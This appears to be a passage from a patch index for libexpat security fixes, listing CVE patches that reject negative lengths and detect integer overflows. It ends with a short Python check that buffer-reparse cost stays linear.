CVE-2023-52425/15-d5b02e9.patch | xmlwf: Document argument "-q" | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/d5b02e96ab95d2a7ae0aea72d00054b9d036d76d | 2023-11-09 |
CVE-2024-45490/01-5c1a316.patch | lib: Reject negative len for XML_ParseBuffer Reported by TaiYou |
Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/5c1a31642e243f4870c0bd1f2afc7597976521bf | 2024-08-19 |
CVE-2024-45490/02-c12f039.patch | tests: Cover "len < 0" for both XML_Parse and XML_ParseBuffer | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/c12f039b8024d6b9a11c20858370495ff6ff5245 | 2024-08-20 |
CVE-2024-45490/03-2db2330.patch | doc: Document that XML_Parse/XML_ParseBuffer reject "len < 0" | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/2db233019f551fe4c701bbbc5eb0fa58ff349daa | 2024-08-25 |
CVE-2024-45491.patch | lib: Detect integer overflow in dtdCopy Reported by TaiYou |
Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/8e439a9947e9dc80a395c0c7456545d8d9d9e421 | 2024-08-19 |
CVE-2024-45492.patch | lib: Detect integer overflow in function nextScaffoldPart Reported by TaiYou |
Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/9bf0f2c16ee86f644dd1432507edff94c08dc232 | 2024-08-19 |
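The cost argument in the CVE-2023-52425/12-3d8141d description above (extra reparse scans bounded by roughly 2n bytes for an n-byte token when the buffer grows by doubling) can be sanity-checked with a short standalone sketch. This is illustrative Python, not Expat code; the function name and the 1024-byte initial buffer are assumptions made for the example.

```python
# Illustrative sketch, not Expat code: the names and the initial buffer
# size (1024 bytes) are assumptions for the example.

def extra_scanned(token_len, initial_buf=1024):
    """Bytes rescanned in failed bypass attempts while one big token
    grows a doubling buffer from initial_buf up past token_len."""
    buf = initial_buf
    extra = 0
    while buf < token_len:
        extra += buf  # bypass reparse over a full buffer that still lacks the token's end
        buf *= 2      # buffer doubles, so more of the token fits next time
    return extra

# Geometric series ... + n/8 + n/4 + n/2 stays below 2n:
n = 10_000_000
assert extra_scanned(n) < 2 * n
```

Because each failed attempt scans a buffer at most twice as large as the previous one, the sum telescopes to less than twice the largest buffer tried, matching the linear bound the commit message claims (and that test_big_tokens_take_linear_time exercises).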